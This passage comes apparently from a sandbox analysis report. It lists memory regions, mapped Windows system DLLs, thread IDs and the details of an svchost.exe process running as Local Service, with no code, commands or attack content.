0x7ffc543d0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 3346 start_va = 0x7ffc545f0000 end_va = 0x7ffc54600fff entry_point = 0x7ffc545f0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 3347 start_va = 0x7ffc54610000 end_va = 0x7ffc5461efff entry_point = 0x7ffc54610000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 3348 start_va = 0x7ffc54620000 end_va = 0x7ffc54663fff entry_point = 0x7ffc54620000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 3349 start_va = 0x7ffc54db0000 end_va = 0x7ffc54f70fff entry_point = 0x7ffc54db0000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 3350 start_va = 0x7ffc54f80000 end_va = 0x7ffc55032fff entry_point = 0x7ffc54f80000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 3351 start_va = 0x7ffc55040000 end_va = 0x7ffc5521cfff entry_point = 0x7ffc55040000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3352 start_va = 0x7ffc552c0000 end_va = 0x7ffc5535cfff entry_point = 0x7ffc552c0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3353 start_va = 0x7ffc554e0000 end_va = 0x7ffc5562dfff entry_point = 0x7ffc554e0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3354 start_va = 0x7ffc55800000 end_va = 0x7ffc558acfff entry_point = 0x7ffc55800000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3355 start_va = 0x7ffc56f10000 end_va = 0x7ffc57094fff entry_point = 0x7ffc56f10000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3356 start_va = 0x7ffc570a0000 end_va = 0x7ffc571c5fff entry_point = 0x7ffc570a0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3357 start_va = 0x7ffc571d0000 end_va = 0x7ffc5744bfff entry_point = 0x7ffc571d0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 3358 start_va = 0x7ffc57540000 end_va = 0x7ffc5759afff entry_point = 0x7ffc57540000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3359 start_va = 0x7ffc57aa0000 end_va = 0x7ffc57b45fff entry_point = 0x7ffc57aa0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3360 start_va = 0x7ffc57b50000 end_va = 0x7ffc57d11fff entry_point = 0x7ffc57b50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 360 os_tid = 0x4f4 Thread: id = 361 os_tid = 0x56c Thread: id = 362 os_tid = 0x464 Thread: id = 363 os_tid = 0x45c Thread: id = 364 os_tid = 0x440 Thread: id = 365 os_tid = 0x424 Thread: id = 470 os_tid = 0xe34 Process: id = "15" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x6dbc2000" os_pid = "0x444" os_integrity_level = "0x4000" os_privileges = "0x60a00000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x1e4" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalServiceNoNetwork" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BFE" [0xe], "NT SERVICE\\CoreMessagingRegistrar" [0xa], "NT SERVICE\\DPS" [0xa], "NT SERVICE\\MpsSvc" [0xa], "NT SERVICE\\NcdAutoSetup" [0xa], "NT SERVICE\\pla" [0xa], "NT SERVICE\\WwanSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:000114c1" [0xc000000f], "LOCAL" [0x7], "NT AUTHORITY\\WRITE RESTRICTED" [0x7] Region: id = 767 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 768 start_va = 0x16ac540000 end_va = 0x16ac54ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000016ac540000" filename = "" Region: id = 769 start_va = 0x16ac550000 end_va = 0x16ac550fff entry_point = 0x16ac550000 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 770 start_va = 0x16ac560000 end_va = 0x16ac573fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000016ac560000" filename = "" Region: id = 771 start_va = 0x16ac580000 end_va = 0x16ac5fffff entry_point = 0x0 region_type = private name = "private_0x00000016ac580000" filename = "" Region: id = 772 start_va = 0x16ac600000 end_va = 0x16ac603fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000016ac600000" filename = "" Region: id = 773 start_va = 0x16ac610000 end_va = 0x16ac610fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000016ac610000" filename = "" Region: id = 774 start_va = 0x16ac620000 end_va = 0x16ac621fff entry_point = 0x0 region_type = private name = "private_0x00000016ac620000" filename = "" Region: id = 775 start_va = 0x16ac630000 end_va = 0x16ac6edfff entry_point = 0x16ac630000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 776 start_va = 0x16ac770000 end_va = 0x16ac770fff entry_point = 0x0 region_type = private name = "private_0x00000016ac770000" filename = "" Region: id = 777 start_va = 0x16ac780000 end_va = 0x16ac780fff entry_point = 0x0 region_type = private name = "private_0x00000016ac780000" filename = "" Region: id = 778 start_va = 0x16ac790000 end_va = 0x16ac796fff entry_point = 0x16ac790000 region_type = mapped_file name = "bfe.dll.mui" filename = "\\Windows\\System32\\en-US\\bfe.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\bfe.dll.mui") Region: id = 779 start_va = 0x16ac7a0000 end_va = 0x16ac7affff entry_point = 0x0 region_type = private name = "private_0x00000016ac7a0000" filename = "" Region: id = 780 start_va = 0x16ac7b0000 end_va = 0x16ac7b0fff entry_point = 0x0 region_type = private name = "private_0x00000016ac7b0000" filename = "" Region: id = 781 start_va = 0x16ac7c0000 end_va = 0x16ac7c6fff entry_point = 0x0 region_type = private name = "private_0x00000016ac7c0000" filename = "" Region: id = 782 start_va = 0x16ac7d0000 end_va = 0x16ac7f3fff entry_point = 0x16ac7d0000 region_type = mapped_file name = "firewallapi.dll.mui" filename = "\\Windows\\System32\\en-US\\FirewallAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\firewallapi.dll.mui") Region: id = 783 start_va = 0x16ac800000 end_va = 0x16ac8fffff entry_point = 0x0 region_type = private name = "private_0x00000016ac800000" filename = "" Region: id = 784 start_va = 0x16ac900000 end_va = 0x16aca87fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000016ac900000" filename = "" Region: id = 785 start_va = 0x16aca90000 end_va = 0x16aca90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000016aca90000" filename = "" Region: id = 786 start_va = 0x16acaa0000 end_va = 0x16acaa0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000016acaa0000" filename = "" Region: id = 787 start_va = 0x16acab0000 end_va = 0x16acab7fff entry_point = 0x0 region_type = private name = "private_0x00000016acab0000" filename = "" Region: id = 788 start_va = 0x16acac0000 end_va = 0x16acac1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000016acac0000" filename = "" Region: id = 789 start_va = 0x16acad0000 end_va = 0x16acad0fff entry_point = 0x0 region_type = private name = "private_0x00000016acad0000" filename = "" Region: id = 790 start_va = 0x16acae0000 end_va = 0x16acae6fff entry_point = 0x0 region_type = private name = "private_0x00000016acae0000" filename = "" Region: id = 791 start_va = 0x16acb00000 end_va = 0x16acbfffff entry_point = 0x0 region_type = private name = "private_0x00000016acb00000" filename = "" Region: id = 792 start_va = 0x16acc00000 end_va = 0x16acd80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000016acc00000" filename = "" Region: id = 793 start_va = 0x16acd90000 end_va = 0x16ace4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000016acd90000" filename = "" Region: id = 794 start_va = 0x16ace50000 end_va = 0x16acf4ffff entry_point = 0x0 region_type = private name = "private_0x00000016ace50000" filename = "" Region: id = 795 start_va = 0x16acf50000 end_va = 0x16ad04ffff entry_point = 0x0 region_type = private name = "private_0x00000016acf50000" filename = "" Region: id = 796 start_va = 0x16ad060000 end_va = 0x16ad066fff entry_point = 0x0 region_type = private name = "private_0x00000016ad060000" filename = "" Region: id = 797 start_va = 0x16ad070000 end_va = 0x16ad0ecfff entry_point = 0x16ad070000 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 798 start_va = 0x16ad100000 end_va = 0x16ad1fffff entry_point = 0x0 region_type = private name = "private_0x00000016ad100000" filename = "" Region: id = 799 start_va = 0x16ad200000 end_va = 0x16ad2fffff entry_point = 0x0 region_type = private name = "private_0x00000016ad200000" filename = "" Region: id = 800 start_va = 0x16ad300000 end_va = 0x16ad3fffff entry_point = 0x0 region_type = private name = "private_0x00000016ad300000" filename = "" Region: id = 801 start_va = 0x16ad400000 end_va = 0x16ad4fffff entry_point = 0x0 region_type = private name = "private_0x00000016ad400000" filename = "" Region: id = 802 start_va = 0x16ad500000 end_va = 0x16ad5fffff entry_point = 0x0 region_type = private name = "private_0x00000016ad500000" filename = "" Region: id = 803 start_va = 0x16ad600000 end_va = 0x16ad6fffff entry_point = 0x0 region_type = private name = "private_0x00000016ad600000" filename = "" Region: id = 804 start_va = 0x16ad800000 end_va = 0x16ad8fffff entry_point = 0x0 region_type = private name = "private_0x00000016ad800000" filename = "" Region: id = 805 start_va = 0x16ad900000 end_va = 0x16ad9fffff entry_point = 0x0 region_type = private name = "private_0x00000016ad900000" filename = "" Region: id = 806 start_va = 0x16ada00000 end_va = 0x16ada7ffff entry_point = 0x0 region_type = private name = "private_0x00000016ada00000" filename = "" Region: id = 807 start_va = 0x16ada80000 end_va = 0x16adb7ffff entry_point = 0x0 region_type = private name = "private_0x00000016ada80000" filename = "" Region: id = 808 start_va = 0x16adb80000 end_va = 0x16adc7ffff entry_point = 0x0 region_type = private name = "private_0x00000016adb80000" filename = "" Region: id = 809 start_va = 0x16adc80000 end_va = 0x16add7ffff entry_point = 0x0 region_type = private name = "private_0x00000016adc80000" filename = "" Region: id = 810 start_va = 0x16add80000 end_va = 0x16ae57ffff entry_point = 0x0 region_type = private name = "private_0x00000016add80000" filename = "" Region: id = 811 start_va = 0x16ae580000 end_va = 0x16ae67ffff entry_point = 0x0 region_type = private name = "private_0x00000016ae580000" filename = "" Region: id = 812 start_va = 0x16ae680000 end_va = 0x16ae77ffff entry_point = 0x0 region_type = private name = "private_0x00000016ae680000" filename = "" Region: id = 813 start_va = 0x16ae780000 end_va = 0x16ae87ffff entry_point = 0x0 region_type = private name = "private_0x00000016ae780000" filename = "" Region: id = 814 start_va = 0x16ae8d0000 end_va = 0x16ae8d6fff entry_point = 0x0 region_type = private name = "private_0x00000016ae8d0000" filename = "" Region: id = 815 start_va = 0x16ae900000 end_va = 0x16ae9fffff entry_point = 0x0 region_type = private name = "private_0x00000016ae900000" filename = "" Region: id = 816 start_va = 0x16aea00000 end_va = 0x16aeafffff entry_point = 0x0 region_type = private name = "private_0x00000016aea00000" filename = "" Region: id = 817 start_va = 0x16aeb00000 end_va = 0x16aebfffff entry_point = 0x0 region_type = private name = "private_0x00000016aeb00000" filename = "" Region: id = 818 start_va = 0x16aec00000 end_va = 0x16aef36fff entry_point = 0x16aec00000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 819 start_va = 0x16aef40000 end_va = 0x16af03ffff entry_point = 0x0 region_type = private name = "private_0x00000016aef40000" filename = "" Region: id = 820 start_va = 0x16af040000 end_va = 0x16af13ffff entry_point = 0x0 region_type = private name = "private_0x00000016af040000" filename = "" Region: id = 821 start_va = 0x16af200000 end_va = 0x16af2fffff entry_point = 0x0 region_type = private name = "private_0x00000016af200000" filename = "" Region: id = 822 start_va = 0x16af300000 end_va = 0x16af3fffff entry_point = 0x0 region_type = private name = "private_0x00000016af300000" filename = "" Region: id = 823 start_va = 0x16af400000 end_va = 0x16af4fffff entry_point = 0x0 region_type = private name = "private_0x00000016af400000" filename = "" Region: id = 824 start_va = 0x16af500000 end_va = 0x16af5fffff entry_point = 0x0 region_type = private name = "private_0x00000016af500000" filename = "" Region: id = 825 start_va = 0x16af680000 end_va = 0x16af686fff entry_point = 0x0 region_type = private name = "private_0x00000016af680000" filename = "" Region: id = 826 start_va = 0x16af700000 end_va = 0x16af7fffff entry_point = 0x0 region_type = private name = "private_0x00000016af700000" filename = "" Region: id = 827 start_va = 0x16af800000 end_va = 0x16af8fffff entry_point = 0x0 region_type = private name = "private_0x00000016af800000" filename = "" Region: id = 828 start_va = 0x16af900000 end_va = 0x16af9fffff entry_point = 0x0 region_type = private name = "private_0x00000016af900000" filename = "" Region: id = 829 start_va = 0x16afa00000 end_va = 0x16afc00fff entry_point = 0x0 region_type = private name = "private_0x00000016afa00000" filename = "" Region: id = 830 start_va = 0x16afc10000 end_va = 0x16afd0ffff entry_point = 0x0 region_type = private name = "private_0x00000016afc10000" filename = "" Region: id = 831 start_va = 0x16afe00000 end_va = 0x16afefffff entry_point = 0x0 region_type = private name = "private_0x00000016afe00000" filename = "" Region: id = 832 start_va = 0x16b03f0000 end_va = 0x16b0671fff entry_point = 0x0 region_type = private name = "private_0x00000016b03f0000" filename = "" Region: id = 833 start_va = 0x16b1300000 end_va = 0x16b1c7ffff entry_point = 0x0 region_type = private name = "private_0x00000016b1300000" filename = "" Region: id = 834 start_va = 0x16b1c80000 end_va = 0x16bc17dfff entry_point = 0x0 region_type = private name = "private_0x00000016b1c80000" filename = "" Region: id = 835 start_va = 0x16d0d90000 end_va = 0x16d0e8ffff entry_point = 0x0 region_type = private name = "private_0x00000016d0d90000" filename = "" Region: id = 836 start_va = 0x16d0e90000 end_va = 0x16d0f8ffff entry_point = 0x0 region_type = private name = "private_0x00000016d0e90000" filename = "" Region: id = 837 start_va = 0x16d1000000 end_va = 0x16d10fffff entry_point = 0x0 region_type = private name = "private_0x00000016d1000000" filename = "" Region: id = 838 start_va = 0x16d1100000 end_va = 0x16d11fffff entry_point = 0x0 region_type = private name = "private_0x00000016d1100000" filename = "" Region: id = 839 start_va = 0x16d1200000 end_va = 0x16d12fffff entry_point = 0x0 region_type = private name = "private_0x00000016d1200000" filename = "" Region: id = 840 start_va = 0x16d1300000 end_va = 0x16d13fffff entry_point = 0x0 region_type = private name = "private_0x00000016d1300000" filename = "" Region: id = 841 start_va = 0x16d1400000 end_va = 0x16d14fffff entry_point = 0x0 region_type = private name = "private_0x00000016d1400000" filename = "" Region: id = 842 start_va = 0x16d1500000 end_va = 0x16d15fffff entry_point = 0x0 region_type = private name = "private_0x00000016d1500000" filename = "" Region: id = 843 start_va = 0x16d1900000 end_va = 0x16d19fffff entry_point = 0x0 region_type = private name = "private_0x00000016d1900000" filename = "" Region: id = 844 start_va = 0x16d1a00000 end_va = 0x16d1afffff entry_point = 0x0 region_type = private name = "private_0x00000016d1a00000" filename = "" Region: id = 845 start_va = 0x16d1b00000 end_va = 0x16d1bfffff entry_point = 0x0 region_type = private name = "private_0x00000016d1b00000" filename = "" Region: id = 846 start_va = 0x16d1c00000 end_va = 0x16d1cfffff entry_point = 0x0 region_type = private name = "private_0x00000016d1c00000" filename = "" Region: id = 847 start_va = 0x16d1d00000 end_va = 0x16d1dfffff entry_point = 0x0 region_type = private name = "private_0x00000016d1d00000" filename = "" Region: id = 848 start_va = 0x16d1e00000 end_va = 0x16d1efffff entry_point = 0x0 region_type = private name = "private_0x00000016d1e00000" filename = "" Region: id = 849 start_va = 0x16d1f00000 end_va = 0x17246e4fff entry_point = 0x0 region_type = private name = "private_0x00000016d1f00000" filename = "" Region: id = 850 start_va = 0x7df5ffd80000 end_va = 0x7ff5ffd7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffd80000" filename = "" Region: id = 851 start_va = 0x7ff6e0bf0000 end_va = 0x7ff6e0bf1fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0bf0000" filename = "" Region: id = 852 start_va = 0x7ff6e0bf2000 end_va = 0x7ff6e0bf3fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0bf2000" filename = "" Region: id = 853 start_va = 0x7ff6e0bf4000 end_va = 0x7ff6e0bf5fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0bf4000" filename = "" Region: id = 854 start_va = 0x7ff6e0bf8000 end_va = 0x7ff6e0bf9fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0bf8000" filename = "" Region: id = 855 start_va = 0x7ff6e0bfa000 end_va = 0x7ff6e0bfbfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0bfa000" filename = "" Region: id = 856 start_va = 0x7ff6e0bfc000 end_va = 0x7ff6e0bfdfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0bfc000" filename = "" Region: id = 857 start_va = 0x7ff6e0bfe000 end_va = 0x7ff6e0bfffff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0bfe000" filename = "" Region: id = 858 start_va = 0x7ff6e0c00000 end_va = 0x7ff6e0c01fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0c00000" filename = "" Region: id = 859 start_va = 0x7ff6e0c02000 end_va = 0x7ff6e0c03fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0c02000" filename = "" Region: id = 860 start_va = 0x7ff6e0c04000 end_va = 0x7ff6e0c05fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0c04000" filename = "" Region: id = 861 start_va = 0x7ff6e0c06000 end_va = 0x7ff6e0c07fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0c06000" filename = "" Region: id = 862 start_va = 0x7ff6e0c08000 end_va = 0x7ff6e0c09fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0c08000" filename = "" Region: id = 863 start_va = 0x7ff6e0c0a000 end_va = 0x7ff6e0c0bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0c0a000" filename = "" Region: id = 864 start_va = 0x7ff6e0c0c000 end_va = 0x7ff6e0c0dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0c0c000" filename = "" Region: id = 865 start_va = 0x7ff6e0c0e000 end_va = 0x7ff6e0c0ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0c0e000" filename = "" Region: id = 866 start_va = 0x7ff6e0c10000 end_va = 0x7ff6e0c11fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0c10000" filename = "" Region: id = 867 start_va = 0x7ff6e0c12000 end_va = 0x7ff6e0c13fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0c12000" filename = "" Region: id = 868 start_va = 0x7ff6e0c14000 end_va = 0x7ff6e0c15fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0c14000" filename = "" Region: id = 869 start_va = 0x7ff6e0c18000 end_va = 0x7ff6e0c19fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0c18000" filename = "" Region: id = 870 start_va = 0x7ff6e0c1a000 end_va = 0x7ff6e0c1bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0c1a000" filename = "" Region: id = 871 start_va = 0x7ff6e0c1c000 end_va = 0x7ff6e0c1dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0c1c000" filename = "" Region: id = 872 start_va = 0x7ff6e0c1e000 end_va = 0x7ff6e0c1ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0c1e000" filename = "" Region: id = 873 start_va = 0x7ff6e0c20000 end_va = 0x7ff6e0d1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6e0c20000" filename = "" Region: id = 874 start_va = 0x7ff6e0d20000 end_va = 0x7ff6e0d42fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6e0d20000" filename = "" Region: id = 875 start_va = 0x7ff6e0d44000 end_va = 0x7ff6e0d45fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0d44000" filename = "" Region: id = 876 start_va = 0x7ff6e0d46000 end_va = 0x7ff6e0d47fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0d46000" filename = "" Region: id = 877 start_va = 0x7ff6e0d48000 end_va = 0x7ff6e0d49fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0d48000" filename = "" Region: id = 878 start_va = 0x7ff6e0d4a000 end_va = 0x7ff6e0d4afff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0d4a000" filename = "" Region: id = 879 start_va = 0x7ff6e0d4e000 end_va = 0x7ff6e0d4ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0d4e000" filename = "" Region: id = 880 start_va = 0x7ff6e1100000 end_va = 0x7ff6e110cfff entry_point = 0x7ff6e1100000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 881 start_va = 0x7ffc48ff0000 end_va = 0x7ffc49459fff entry_point = 0x7ffc48ff0000 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 882 start_va = 0x7ffc4a430000 end_va = 0x7ffc4a442fff entry_point = 0x7ffc4a430000 region_type = mapped_file name = "srumapi.dll" filename = "\\Windows\\System32\\srumapi.dll" (normalized: "c:\\windows\\system32\\srumapi.dll") Region: id = 883 start_va = 0x7ffc4a450000 end_va = 0x7ffc4a462fff entry_point = 0x7ffc4a450000 region_type = mapped_file name = "energyprov.dll" filename = "\\Windows\\System32\\energyprov.dll" (normalized: "c:\\windows\\system32\\energyprov.dll") Region: id = 884 start_va = 0x7ffc4aed0000 end_va = 0x7ffc4aedcfff entry_point = 0x7ffc4aed0000 region_type = mapped_file name = "ncuprov.dll" filename = "\\Windows\\System32\\ncuprov.dll" (normalized: "c:\\windows\\system32\\ncuprov.dll") Region: id = 885 start_va = 0x7ffc4b090000 end_va = 0x7ffc4b09dfff entry_point = 0x7ffc4b090000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 886 start_va = 0x7ffc4b100000 end_va = 0x7ffc4b10dfff entry_point = 0x7ffc4b100000 region_type = mapped_file name = "wpnsruprov.dll" filename = "\\Windows\\System32\\wpnsruprov.dll" (normalized: "c:\\windows\\system32\\wpnsruprov.dll") Region: id = 887 start_va = 0x7ffc4b110000 end_va = 0x7ffc4b126fff entry_point = 0x7ffc4b110000 region_type = mapped_file name = "appsruprov.dll" filename = "\\Windows\\System32\\appsruprov.dll" (normalized: "c:\\windows\\system32\\appsruprov.dll") Region: id = 888 start_va = 0x7ffc4b130000 end_va = 0x7ffc4b14afff entry_point = 0x7ffc4b130000 region_type = mapped_file name = "eeprov.dll" filename = "\\Windows\\System32\\eeprov.dll" (normalized: "c:\\windows\\system32\\eeprov.dll") Region: id = 889 start_va = 0x7ffc4b150000 end_va = 0x7ffc4b164fff entry_point = 0x7ffc4b150000 region_type = mapped_file name = "nduprov.dll" filename = "\\Windows\\System32\\nduprov.dll" (normalized: "c:\\windows\\system32\\nduprov.dll") Region: id = 890 start_va = 0x7ffc4b170000 end_va = 0x7ffc4b1cefff entry_point = 0x7ffc4b170000 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 891 start_va = 0x7ffc4b890000 end_va = 0x7ffc4b899fff entry_point = 0x7ffc4b890000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 892 start_va = 0x7ffc4b8a0000 end_va = 0x7ffc4b8bcfff entry_point = 0x7ffc4b8a0000 region_type = mapped_file name = "radardt.dll" filename = "\\Windows\\System32\\radardt.dll" (normalized: "c:\\windows\\system32\\radardt.dll") Region: id = 893 start_va = 0x7ffc4bc70000 end_va = 0x7ffc4bf51fff entry_point = 0x7ffc4bc70000 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 894 start_va = 0x7ffc4bf60000 end_va = 0x7ffc4bf97fff entry_point = 0x7ffc4bf60000 region_type = mapped_file name = "srumsvc.dll" filename = "\\Windows\\System32\\srumsvc.dll" (normalized: "c:\\windows\\system32\\srumsvc.dll") Region: id = 895 start_va = 0x7ffc4c210000 end_va = 0x7ffc4c218fff entry_point = 0x7ffc4c210000 region_type = mapped_file name = "pnpts.dll" filename = "\\Windows\\System32\\pnpts.dll" (normalized: "c:\\windows\\system32\\pnpts.dll") Region: id = 896 start_va = 0x7ffc4c220000 end_va = 0x7ffc4c25efff entry_point = 0x7ffc4c220000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 897 start_va = 0x7ffc4c260000 end_va = 0x7ffc4c26bfff entry_point = 0x7ffc4c260000 region_type = mapped_file name = "wfapigp.dll" filename = "\\Windows\\System32\\wfapigp.dll" (normalized: "c:\\windows\\system32\\wfapigp.dll") Region: id = 898 start_va = 0x7ffc4c470000 end_va = 0x7ffc4c5d5fff entry_point = 0x7ffc4c470000 region_type = mapped_file name = "diagperf.dll" filename = "\\Windows\\System32\\diagperf.dll" (normalized: "c:\\windows\\system32\\diagperf.dll") Region: id = 899 start_va = 0x7ffc4dab0000 end_va = 0x7ffc4daccfff entry_point = 0x7ffc4dab0000 region_type = mapped_file name = "wdi.dll" filename = "\\Windows\\System32\\wdi.dll" (normalized: "c:\\windows\\system32\\wdi.dll") Region: id = 900 start_va = 0x7ffc4dbe0000 end_va = 0x7ffc4dc0efff entry_point = 0x7ffc4dbe0000 region_type = mapped_file name = "dps.dll" filename = "\\Windows\\System32\\dps.dll" (normalized: "c:\\windows\\system32\\dps.dll") Region: id = 901 start_va = 0x7ffc4ddd0000 end_va = 0x7ffc4e145fff entry_point = 0x7ffc4ddd0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 902 start_va = 0x7ffc4f1f0000 end_va = 0x7ffc4f2fefff entry_point = 0x7ffc4f1f0000 region_type = mapped_file name = "mrmcorer.dll" filename = "\\Windows\\System32\\MrmCoreR.dll" (normalized: "c:\\windows\\system32\\mrmcorer.dll") Region: id = 903 start_va = 0x7ffc4f8b0000 end_va = 0x7ffc4f8b7fff entry_point = 0x7ffc4f8b0000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 904 start_va = 0x7ffc4f8c0000 end_va = 0x7ffc4f8c7fff entry_point = 0x7ffc4f8c0000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 905 start_va = 0x7ffc4f8d0000 end_va = 0x7ffc4f8d9fff entry_point = 0x7ffc4f8d0000 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\System32\\wshqos.dll" (normalized: "c:\\windows\\system32\\wshqos.dll") Region: id = 906 start_va = 0x7ffc4f8e0000 end_va = 0x7ffc4f8e9fff entry_point = 0x7ffc4f8e0000 region_type = mapped_file name = "adhapi.dll" filename = "\\Windows\\System32\\adhapi.dll" (normalized: "c:\\windows\\system32\\adhapi.dll") Region: id = 907 start_va = 0x7ffc4f8f0000 end_va = 0x7ffc4f981fff entry_point = 0x7ffc4f8f0000 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" 